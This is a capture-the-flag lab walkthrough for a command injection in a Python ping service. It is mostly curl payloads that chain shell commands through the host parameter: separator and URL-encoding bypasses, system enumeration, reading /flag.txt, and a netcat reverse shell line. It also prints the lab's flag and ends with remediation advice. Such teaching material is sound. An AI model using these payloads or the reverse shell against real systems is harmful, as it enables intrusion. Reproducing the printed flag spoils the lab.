Avatar

Labs / Ping Pwn

  • Daily Challenge
  • Released 23 Jul 2025
The lab needs to be started first.
Need help to start?
Daily Challenge

Ping Pwn - Complete Solution Walkthrough

Step 1: Initial Service Discovery

  1. Challenge Presentation: Access the challenge at <target-ip>:80 to read the challenge description and understand the objectives.
  2. Service Discovery: The challenge indicates a network monitoring service is running. Scan for open ports:
nmap -p 1-10000 <target-ip>
  1. Identify Services: You should find:
    • Port 80: Web server hosting the challenge description
    • Port 8080: The target network monitoring service
  2. Service Enumeration: Access the monitoring service:
curl http://<target-ip>:8080/

Step 2: Service Analysis and Exploration

  1. Web Interface Analysis: The service presents a "Network Monitoring Tool" with a form interface for testing network connectivity.
  2. Functionality Testing: The service provides a ping functionality through HTTP GET parameters. Test basic functionality:
curl "http://<target-ip>:8080/ping?host=google.com"
  1. Response Analysis: The service returns the output of a ping command, suggesting it executes system commands based on user input.
  2. Parameter Identification: The service accepts a host parameter that appears to be passed directly to a ping command.
  3. Additional Endpoint Discovery: Check for other endpoints:
curl http://<target-ip>:8080/health

Step 3: Vulnerability Identification - Command Injection Testing

  1. Hypothesis: If the service passes user input directly to system commands without proper sanitization, it may be vulnerable to command injection.
  2. Basic Injection Test: Test command chaining using semicolon separator:
curl "http://<target-ip>:8080/ping?host=google.com;whoami"
  1. Expected Result: If vulnerable, you should see both ping output and the result of the whoami command.
  2. Alternative Injection Methods: If semicolons are filtered, test other command separators:
# Using logical AND operator
curl "http://<target-ip>:8080/ping?host=google.com&&id"

# Using logical OR operator  
curl "http://<target-ip>:8080/ping?host=invalidhost||whoami"

# Using backticks for command substitution
curl "http://<target-ip>:8080/ping?host=\`whoami\`"

# Using $() for command substitution
curl "http://<target-ip>:8080/ping?host=\$(id)"

Step 4: System Reconnaissance and Flag Discovery

  1. System Information Gathering: Once command injection is confirmed, gather system information:
# Check current user and groups
curl "http://<target-ip>:8080/ping?host=google.com;id"

# List current directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la"

# Check root directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /"

# Check working directory
curl "http://<target-ip>:8080/ping?host=google.com;pwd"
  1. Flag File Discovery: Search for flag files in common locations:
# Search for files containing 'flag'
curl "http://<target-ip>:8080/ping?host=google.com;find / -name '*flag*' 2>/dev/null"

# Check for flag.txt in root directory
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /flag.txt"

# Search in common CTF flag locations
curl "http://<target-ip>:8080/ping?host=google.com;find /home /root /tmp -name 'flag*' 2>/dev/null"

Step 5: Flag Extraction

  1. Read the Flag File: Once you locate the flag at /flag.txt, extract its contents:
curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt"
  1. Alternative Reading Methods: If cat doesn't work, try alternative approaches:
# Using head command
curl "http://<target-ip>:8080/ping?host=google.com;head /flag.txt"

# Using tail command
curl "http://<target-ip>:8080/ping?host=google.com;tail /flag.txt"

# Using more command
curl "http://<target-ip>:8080/ping?host=google.com;more /flag.txt"

# Using xxd for hex dump
curl "http://<target-ip>:8080/ping?host=google.com;xxd /flag.txt"
  1. Flag Verification: The flag should be in UUID format:
2d14fec8-29c6-4f8d-9fbc-5ce16aceb252

Step 6: Advanced Exploitation Techniques

  1. URL Encoding: If special characters are filtered, use URL encoding:
# URL encoded semicolon (%3B) and space (%20)
curl "http://<target-ip>:8080/ping?host=google.com%3Bcat%20/flag.txt"

# URL encoded ampersand (%26)
curl "http://<target-ip>:8080/ping?host=google.com%26%26cat%20/flag.txt"
  1. Environment Variable Exploitation: Explore environment variables for additional information:
# Display all environment variables
curl "http://<target-ip>:8080/ping?host=google.com;env"

# Check specific variables
curl "http://<target-ip>:8080/ping?host=google.com;echo \$HOME"
curl "http://<target-ip>:8080/ping?host=google.com;echo \$PATH"
  1. Process and Network Information: Gather additional system intelligence:
# List running processes
curl "http://<target-ip>:8080/ping?host=google.com;ps aux"

# Check network connections
curl "http://<target-ip>:8080/ping?host=google.com;netstat -an"

# Check system information
curl "http://<target-ip>:8080/ping?host=google.com;uname -a"

Step 7: Understanding the Vulnerability

  1. Root Cause Analysis: The vulnerability exists because the application uses Python's os.popen() function with user-controlled input without proper sanitization.
  2. Vulnerable Code Pattern: The problematic code likely looks like:
# Vulnerable implementation
command = f"ping -c 1 {host}"
result = os.popen(command).read()
  1. Attack Vector: By including command separators in the host parameter, attackers can append additional commands that get executed by the shell.
  2. Impact Assessment: This vulnerability allows for complete system compromise with the privileges of the web application user.

Step 8: Alternative Exploitation Methods

  1. Python-based Payload: Use Python for more complex operations:
# Python one-liner to read flag
curl "http://<target-ip>:8080/ping?host=google.com;python3 -c 'print(open("/flag.txt").read().strip())'"
  1. Base64 Encoding: If output filtering is implemented, use base64 encoding:
# Base64 encode the flag
curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt | base64"

# Decode locally
echo "" | base64 -d
  1. Reverse Shell (Advanced): For persistent access (if needed for other objectives):
# Simple reverse shell (replace with your IP and port)
curl "http://<target-ip>:8080/ping?host=google.com;nc   -e /bin/sh"

Security Implications and Remediation

  1. Vulnerability Classification: This is a critical command injection vulnerability (CWE-78) that allows remote code execution.
  2. Proper Remediation:
    • Use parameterized commands instead of string concatenation
    • Implement strict input validation with allowlists
    • Use subprocess with shell=False in Python
    • Apply principle of least privilege
    • Implement proper error handling and logging
  3. Secure Implementation Example:
# Secure implementation
import subprocess
import re

# Validate input - only allow valid hostnames/IPs
if re.match(r'^[a-zA-Z0-9.-]+$', host):
    result = subprocess.run(['ping', '-c', '1', host], 
                          capture_output=True, text=True, timeout=10)
    return result.stdout
else:
    return "Invalid host format"

Tools and Techniques Summary

  • Service Discovery: nmap, curl, manual exploration
  • Vulnerability Testing: Command injection payloads, multiple separator types
  • Data Extraction: System commands (cat, find, ls), file operations
  • Encoding/Bypasses: URL encoding, base64 encoding, alternative commands
  • Post-Exploitation: System reconnaissance, environment analysis